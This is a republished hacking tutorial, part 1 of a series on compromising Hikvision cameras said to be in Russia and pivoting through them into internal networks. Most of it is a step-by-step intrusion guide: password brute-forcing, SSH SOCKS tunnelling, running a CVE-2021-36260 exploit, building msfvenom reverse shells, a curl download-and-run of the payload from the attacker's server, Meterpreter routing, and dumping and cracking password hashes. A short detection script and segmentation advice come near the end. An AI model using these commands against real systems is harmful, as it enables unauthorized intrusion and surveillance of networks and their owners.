National Cyber Warfare Foundation (NCWF)

Network Espionage: Using Russian Cameras as Proxy


2025-06-20 14:08:19
milo
Red Team (CNA)



The post Network Espionage: Using Russian Cameras as Proxy first appeared on Hackers Arise.







Part 1





Hello, cyberwarriors. You’ve heard how camera hacking plays a role in espionage. In our previous series, we covered how we’ve been spying on Russian forces in occupied Ukrainian territory. During the ongoing cyberwar, we’ve gained access to a large number of cameras across Russia, starting in the occupied areas and reaching deep into Moscow.













This time, we’re taking it further and showing how compromising a camera can give you access to the network behind it.





Now let’s say you’ve compromised a camera and want to pivot deeper into the network. We’ll walk through a few examples, starting with enabling SSH and ending with deploying payloads using unpatched vulnerabilities. In Parts 2 and 3, you will learn how to analyze and modify the firmware.





Case 1: Hikvision





Hikvision is one of the most common camera brands used across Russia. As shown in the screenshot below, thousands of their devices are exposed online via Shodan. Many of them still haven’t been patched against known vulnerabilities like CVE-2021-36260, even in 2025. This vulnerability can give you shell access on the device.

















If you brute-force a password and get into the web interface, go to the settings and enable SSH. This setting is often available on Hikvision cameras and sometimes on other brands.

























Once SSH is on, set up an SSH tunnel to route your traffic through the camera with the same credentials:





kali > ssh -D 9050 -4 admin@

















If credentials work, you’re in. Sometimes the SSH port expects a different set of credentials. Remember, the SSH setting might automatically disable after a while, so you’ll need to re-enable it via the dashboard.





Now configure proxychains:





kali > sudo nano /etc/proxychains4.conf

















Make sure the port (9050) matches what you used in the SSH tunnel. With this setup, you can begin scanning the internal network. Most cameras aren’t segmented from other devices, so once you’re inside, you can talk to almost anything. Let’s do a basic network scan through the camera. Note that in the example below I used a different port:





kali > proxychains4 nmap 192.168.1.0/24 -Pn

















If nmap isn’t available, use nc:





kali > proxychains4 nc -zv 192.168.1.15 445





For easier subnet scanning, you can automate this with a simple bash loop. It’s important to know how to scan hosts with nc, because your target might not have all the necessary tools installed.





Case 2: CVE-2021-36260













This Hikvision vulnerability is still unpatched on many systems. If you find a target with this flaw, run the exploit like this:





kali > git clone https://github.com/Aiminsun/CVE-2021-36260





kali > cd CVE-2021-36260





kali > python3 CVE-2021-36260.py --rport --rhost --shell

















Once you have a shell, you will need a payload to turn the camera into a network proxy. Let’s see how to generate the right payload based on the device’s architecture.





Architecture





First you want to determine the architecture of the target:





target > uname -m





Common outputs and what they mean:





x86 or i686: 32-bit Intel
x86_64: 64-bit Intel
armv7l: ARM
mips, mipsel: MIPS variants





Payload Generation





For 32-bit Intel:





kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

















For 64-bit Intel:





kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

















For ARM:





kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

















For MIPS:





kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

















Once generated, upload and run the payload.





File Upload





Simply use curl while hosting a payload on an HTTP server. First go to the directory where the payload was generated and then set up an HTTP server:





kali > cd payload





kali > python3 -m http.server





target > curl -O http://kali_ip:8000/shell.elf





target > chmod +x shell.elf





target > ./shell.elf





If you have an SSH port open, you can use this:





kali > scp shell.elf admin@:/tmp/shell.elf





target > cd /tmp





target > chmod +x shell.elf





target > ./shell.elf





Listener





On your machine, set up a handler with the same payload to receive the connection.

















Meterpreter Proxy





Once we get a Meterpreter session back, we need to set up routing. Routing in Metasploit defines which hosts are reachable through a session:





Meterpreter > run autoroute -s 192.168.1.0/24





Meterpreter > background





msf6 > use auxiliary/server/socks_proxy





msf6 > run -j

















Here is how the module should be configured. If needed, update your proxychains4.conf to point to your proxy (9050), and now you can scan and move within the internal network as needed, just like in the first case.





Bonus: Cracking Hashes





There is yet another way to get into Hikvision cameras. In some cases, the firewall blocks your attempt to land a shell using the --shell option from the CVE-2021-36260 exploit. When that happens, you can fall back on brute forcing the password hash from the admin panel.

















Start by using the command below to try and extract the contents of the /etc/ directory:





python3 CVE-2021-36260.py --rhost --rport --cmd "cat /etc/*"

















The exploit doesn’t allow for complex commands, so you need to be efficient. You won’t be able to split the payload like we will be doing in Part 2. Instead, you want to quickly locate the file that holds the hashes.

















Once you have the hash copied, move to cracking it. Hikvision has a built-in requirement for all passwords to be at least 8 characters long. So, before starting hashcat, filter your wordlist:





awk 'length($0) >= 8' rockyou.txt > wordlist.txt





This will save time and skip unnecessary short entries. Cracking the hash is resource-intensive and may take a while depending on your hardware and the complexity of the password. Run hashcat using mode 500 (MD5 crypt) as shown below:





hashcat -m 500 hash.txt wordlist.txt

















Let it run and monitor for successful recovery. With persistence and enough dictionary strength, you’ll eventually crack the password. Once done, use it to log in via the web interface or SSH, if you later enable it. This method is slower than others but effective when shell payloads fail. Keep it in your toolkit when other vectors are closed.





Conclusion





As shown, some cameras are easy to turn into a stepping stone. All you need is a working password, an unpatched vulnerability or a good wordlist. Since cameras are rarely segmented from the main network, once you’re in, you have potential access to everything. They make excellent proxies for network reconnaissance or further attacks.
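Seen from the defending network, both cases above leave the same trace: the camera itself starts opening connections, to many internal hosts when it is used as a scanning proxy and to an outside address when it downloads a file or calls back. The detection sketch below is an added example, not part of the original post; the flow-record format, the camera and allowed-peer addresses, the window, the threshold and the sample records are all constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Site-specific assumptions (not from the original post).
CAMERAS = {"192.168.1.64"}                  # known camera addresses
INTERNAL = ipaddress.ip_network("192.168.1.0/24")
ALLOWED_PEERS = {"192.168.1.10"}            # recorder/NTP host cameras may contact
WINDOW = 300                                # seconds per counting bucket
FANOUT_THRESHOLD = 5                        # distinct internal (host, port) pairs

# Constructed flow records: "epoch initiator destination dest_port".
SAMPLE_FLOWS = """\
1750428000 192.168.1.10 192.168.1.64 554
1750428010 192.168.1.64 192.168.1.10 123
1750428100 192.168.1.64 192.168.1.15 445
1750428101 192.168.1.64 192.168.1.15 22
1750428102 192.168.1.64 192.168.1.20 445
1750428103 192.168.1.64 192.168.1.21 80
1750428104 192.168.1.64 192.168.1.22 3389
1750428200 192.168.1.64 203.0.113.7 8000
1750428300 192.168.1.33 192.168.1.15 445
"""

def parse(text):
    """Yield (ts, src, dst, dport) tuples, skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0].isdigit() and parts[3].isdigit():
            yield int(parts[0]), parts[1], parts[2], int(parts[3])

def detect(flows):
    """Flag camera-initiated connections that a camera has no reason to make."""
    fanout = defaultdict(set)
    alerts = []
    for ts, src, dst, dport in flows:
        if src not in CAMERAS or dst in ALLOWED_PEERS:
            continue
        if ipaddress.ip_address(dst) in INTERNAL:
            # Proxy-style scanning shows up as many distinct internal targets.
            fanout[(src, ts - ts % WINDOW)].add((dst, dport))
        else:
            # Any camera-initiated connection leaving the site is suspicious.
            alerts.append(("external-connect", src, dst, dport))
    for (cam, start), targets in fanout.items():
        if len(targets) >= FANOUT_THRESHOLD:
            alerts.append(("internal-fanout", cam, start, len(targets)))
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_FLOWS)):
        print(alert)
```

Placing cameras on their own VLAN with a default-deny rule for camera-initiated traffic turns both alert types into blocked connections rather than after-the-fact findings.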





In the following parts, we’ll cover firmware reverse engineering and modification. Things will get more advanced. Stay tuned.








Source: HackersArise
Source Link: https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy/





Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.